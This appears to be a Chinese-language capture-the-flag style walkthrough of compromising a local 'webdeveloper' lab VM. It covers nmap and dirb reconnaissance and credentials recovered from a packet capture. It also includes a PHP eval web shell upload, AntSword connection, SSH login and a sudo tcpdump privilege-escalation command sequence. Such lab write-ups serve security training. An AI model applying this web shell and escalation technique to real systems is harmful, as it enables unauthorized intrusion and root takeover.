1.信息收集
1)打开黑盒机器webdevelop
发现进入一个登录界面,我们得到的有效信息是:黑盒机器webdevelpoer是一个ubuntu系统
2)确定kali的ip
ifconfig
3) 已经确定kali和黑盒机器是在同一局域网下的,所以进行nmap扫描
nmap -sP 192.168.145.0/24
排除掉较小的1和2,较大的254,以及kali的ip131,另外俩个黑盒机器132和129,我们确定webdevelop的ip为192.168.145.133
4)ping通webdevelop
确定能ping通webdevelop,确定是能联网的,ctrl+c结束
5)对webdevelop进行nmap扫描
a)普通快速扫描
b)若想获取更全面信息
nmap -p- -A ip
发现端口22和80
tcp 22 SSH 可根据已搜集到的信息尝试爆破,v1版本可中间人,ssh隧道及内网代理转发,文件传输等等
tcp 80 通常提供web服务。
由于端口80的http协议,我们直接上火狐搜索
也可以dirb扫描一下目录
dirb http://192.168.145.133
此时信息搜集基本完成,下边进行漏洞利用
2.漏洞利用
由于有网站我们就可以把重心放在网站上
进入所有扫出来的网址看看,发现在ipdata的网页下有个流量包
下载下来用wireshark打开
然后尝试在登录界面随便输入账号密码,按f12查看network
发现登录是POST请求
在wireshark中过滤查看
疑似发现了用户账号信息
用户名:webdeveloper
密码:Te5eQg&4sBS!Yr$)wf%(DcAd
尝试登录
成功登入
在网站中查找漏洞,上传一句话木马
<?php @eval($_POST['cmd'])?>
使用蚁剑建立连接
测试连接成功,点击添加
点击新建立的数据,查看信息
在wp-config-php下发现数据库账号和密码
尝试登录ssh
ssh webdeveloper@192.168.145.133
成功登入
下边进行用户越权
sudo -l
查看权限
发现可以利用tcpdump提权
COMMAND='id'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root
成功越权